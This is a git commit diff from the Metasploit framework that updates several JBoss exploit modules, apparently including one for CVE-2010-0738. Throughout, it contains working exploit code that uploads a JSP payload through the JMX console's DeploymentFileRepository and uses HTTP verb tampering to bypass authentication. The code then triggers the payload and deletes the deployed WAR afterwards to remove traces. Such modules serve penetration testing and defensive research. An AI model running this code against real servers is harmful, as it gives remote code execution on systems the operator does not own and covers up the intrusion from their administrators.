another update for jboss stuff, thanks Patrick!
git-svn-id: file:///home/svn/framework3/trunk@9596 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
920710a5fd
commit
099b90b0d6
|
@ -75,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
verb = 'HEAD'
|
verb = 'HEAD'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
p = payload
|
||||||
if datastore['SHELL'] == 'automatic'
|
if datastore['SHELL'] == 'automatic'
|
||||||
if not (plat = detect_platform())
|
if not (plat = detect_platform())
|
||||||
raise RuntimeError, 'Unable to detect platform!'
|
raise RuntimeError, 'Unable to detect platform!'
|
||||||
|
@ -92,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Payload generation already happened, therefore SHELL will
|
# Payload generation already happened, therefore SHELL will
|
||||||
# already be 'automatic' in the payload regardless of what we set above.
|
# already be 'automatic' in the payload regardless of what we set above.
|
||||||
# To fix this, we regenerate the payload now..
|
# To fix this, we regenerate the payload now..
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(platform, target_arch)) == nil)
|
||||||
end
|
end
|
||||||
|
|
||||||
# The following Beanshell script will write the exploded WAR file to the deploy/
|
# The following Beanshell script will write the exploded WAR file to the deploy/
|
||||||
|
|
|
@ -18,48 +18,53 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
|
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module uses the DeploymentFileRepository class in
|
This module uses the DeploymentFileRepository class in
|
||||||
JBoss Application Server (jbossas) to deploy a JSP file
|
JBoss Application Server (jbossas) to deploy a JSP file
|
||||||
in a minimal WAR context.
|
in a minimal WAR context.
|
||||||
},
|
},
|
||||||
'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
|
'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
||||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
|
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Platform' => ['linux', 'windows' ],
|
'Platform' => ['linux', 'windows' ],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Universal',
|
[ 'Universal',
|
||||||
{
|
|
||||||
'Arch' => ARCH_JAVA,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
{
|
||||||
'DisableNops' => true,
|
'Arch' => ARCH_JAVA,
|
||||||
},
|
'Payload' =>
|
||||||
}
|
{
|
||||||
],
|
'DisableNops' => true,
|
||||||
],
|
},
|
||||||
'DefaultTarget' => 0))
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
|
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
|
||||||
OptString.new('PATH', [ true, "Deployment path", rand_text_alphanumeric(8+rand(8))]),
|
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
|
||||||
OptString.new('JSP', [ true, "JSP filename (without .jsp extension)", rand_text_alphanumeric(8+rand(8))]),
|
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
|
||||||
|
OptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]),
|
||||||
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
|
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
|
||||||
|
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
|
||||||
|
|
||||||
|
p = payload
|
||||||
if datastore['SHELL'] == 'automatic'
|
if datastore['SHELL'] == 'automatic'
|
||||||
if not (plat = detect_platform())
|
if not (plat = detect_platform())
|
||||||
raise RuntimeError, 'Unable to detect platform!'
|
raise RuntimeError, 'Unable to detect platform!'
|
||||||
|
@ -74,75 +79,129 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("SHELL set to #{datastore['SHELL']}")
|
print_status("SHELL set to #{datastore['SHELL']}")
|
||||||
|
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(plat, target_arch)) == nil)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# UPLOAD
|
||||||
|
#
|
||||||
data = 'action=invokeOpByName'
|
data = 'action=invokeOpByName'
|
||||||
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
|
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
|
||||||
data << '&methodName=store'
|
data << '&methodName=store'
|
||||||
data << '&argType=java.lang.String'
|
data << '&argType=java.lang.String'
|
||||||
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH']) + '.war'
|
data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
|
||||||
data << '&argType=java.lang.String'
|
data << '&argType=java.lang.String'
|
||||||
data << '&arg1=' + datastore['JSP']
|
data << '&arg1=' + jsp_name
|
||||||
data << '&argType=java.lang.String'
|
data << '&argType=java.lang.String'
|
||||||
data << '&arg2=.jsp'
|
data << '&arg2=.jsp'
|
||||||
data << '&argType=java.lang.String'
|
data << '&argType=java.lang.String'
|
||||||
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
|
data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
|
||||||
data << '&argType=boolean'
|
data << '&argType=boolean'
|
||||||
data << '&arg4=True'
|
data << '&arg4=True'
|
||||||
|
|
||||||
if (datastore['VERB'] == "POST")
|
if (datastore['VERB'] == "POST")
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => '/jmx-console/HtmlAdaptor',
|
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||||
'method' => datastore['VERB'],
|
'method' => datastore['VERB'],
|
||||||
'data' => data
|
'data' => data
|
||||||
}, 5)
|
}, 5)
|
||||||
else
|
else
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
|
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
|
||||||
'method' => datastore['VERB'],
|
'method' => datastore['VERB'],
|
||||||
}, 5)
|
}, 5)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# EXECUTE
|
||||||
|
#
|
||||||
# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
|
# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
|
||||||
# but the file still gets written.
|
# but the file still gets written.
|
||||||
if (res.code == 200 || res.code == 500)
|
if (res.code == 200 || res.code == 500)
|
||||||
uri = '/' + datastore['PATH'] + '/' + datastore['JSP'] + '.jsp'
|
uri = '/' + app_base + '/' + jsp_name + '.jsp'
|
||||||
print_status("Triggering payload at '#{uri}'...")
|
print_status("Triggering payload at '#{uri}'...")
|
||||||
verb = 'GET'
|
verb = 'GET'
|
||||||
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
|
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
|
||||||
verb = 'HEAD'
|
verb = 'HEAD'
|
||||||
end
|
end
|
||||||
# JBoss might need some time for the deployment. Try 5 times at most
|
# JBoss might need some time for the deployment. Try 5 times at most
|
||||||
# and sleep 3 seconds in between.
|
# and sleep 3 seconds in between.
|
||||||
5.times do
|
5.times do
|
||||||
res = send_request_raw(
|
res = send_request_raw(
|
||||||
{
|
{
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => verb,
|
'method' => verb,
|
||||||
})
|
})
|
||||||
if !res
|
if !res
|
||||||
print_error("Execution failed on '#{uri}' [No Response], retrying...")
|
print_error("Execution failed on '#{uri}' [No Response], retrying...")
|
||||||
select(nil,nil,nil,3)
|
select(nil,nil,nil,3)
|
||||||
elsif (res.code < 200 or res.code >= 300)
|
elsif (res.code < 200 or res.code >= 300)
|
||||||
print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
|
print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
|
||||||
select(nil,nil,nil,3)
|
select(nil,nil,nil,3)
|
||||||
elsif res.code == 200
|
elsif res.code == 200
|
||||||
print_status("Successfully triggered payload at '#{uri}'.")
|
print_status("Successfully triggered payload at '#{uri}'.")
|
||||||
break
|
break
|
||||||
|
else
|
||||||
|
print_error("Denied...")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
else
|
|
||||||
print_error("Denied...")
|
#
|
||||||
|
# DELETE
|
||||||
|
#
|
||||||
|
# The WAR can only be removed by physically deleting it, otherwise it
|
||||||
|
# will get redeployed after a server restart.
|
||||||
|
print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
|
||||||
|
res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
|
||||||
|
res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
|
||||||
|
[res1, res2].each do |res|
|
||||||
|
if !res
|
||||||
|
print_error("WARNING: Unable to remove WAR [No Response]")
|
||||||
|
end
|
||||||
|
if (res.code < 200 || res.code >= 300)
|
||||||
|
print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
handler
|
||||||
end
|
end
|
||||||
handler
|
end
|
||||||
|
|
||||||
|
# Delete a file with DeploymentFileRepository.remove().
|
||||||
|
def delete_file(folder, name, ext)
|
||||||
|
data = 'action=invokeOpByName'
|
||||||
|
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
|
||||||
|
data << '&methodName=remove'
|
||||||
|
data << '&argType=java.lang.String'
|
||||||
|
data << '&arg0=' + folder
|
||||||
|
data << '&argType=java.lang.String'
|
||||||
|
data << '&arg1=' + name
|
||||||
|
data << '&argType=java.lang.String'
|
||||||
|
data << '&arg2=' + ext
|
||||||
|
|
||||||
|
if (datastore['VERB'] == "POST")
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||||
|
'method' => datastore['VERB'],
|
||||||
|
'data' => data
|
||||||
|
}, 5)
|
||||||
|
else
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
|
||||||
|
'method' => datastore['VERB'],
|
||||||
|
}, 5)
|
||||||
|
end
|
||||||
|
res
|
||||||
end
|
end
|
||||||
|
|
||||||
def detect_platform
|
def detect_platform
|
||||||
print_status("Attempting to automatically detect the platform...")
|
print_status("Attempting to automatically detect the platform...")
|
||||||
path = '/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||||
res = send_request_raw(
|
res = send_request_raw(
|
||||||
{
|
{
|
||||||
'uri' => path,
|
'uri' => path,
|
||||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
|
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Platform' => [ 'win', 'linux' ],
|
'Platform' => [ 'win', 'linux', 'java' ],
|
||||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
@ -138,6 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
else
|
else
|
||||||
print_status("Using manually select target \"#{mytarget.name}\"")
|
print_status("Using manually select target \"#{mytarget.name}\"")
|
||||||
end
|
end
|
||||||
|
arch = mytarget.arch
|
||||||
|
|
||||||
# Find out which shell if we're using a Java target
|
# Find out which shell if we're using a Java target
|
||||||
if (mytarget.name =~ /Java/)
|
if (mytarget.name =~ /Java/)
|
||||||
|
@ -153,15 +154,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("SHELL set to #{datastore['SHELL']}")
|
print_status("SHELL set to #{datastore['SHELL']}")
|
||||||
|
|
||||||
else
|
else
|
||||||
# set arch/platform from the target
|
# set arch/platform from the target
|
||||||
arch = mytarget['Arch']
|
|
||||||
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
|
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
|
||||||
end
|
end
|
||||||
|
|
||||||
# We must regenerate the payload in case our auto-magic changed something.
|
# We must regenerate the payload in case our auto-magic changed something.
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(plat, arch)) == nil)
|
||||||
|
|
||||||
# Generate the WAR containing the payload
|
# Generate the WAR containing the payload
|
||||||
if (mytarget.name =~ /Java/)
|
if (mytarget.name =~ /Java/)
|
||||||
|
|
Loading…
Reference in New Issue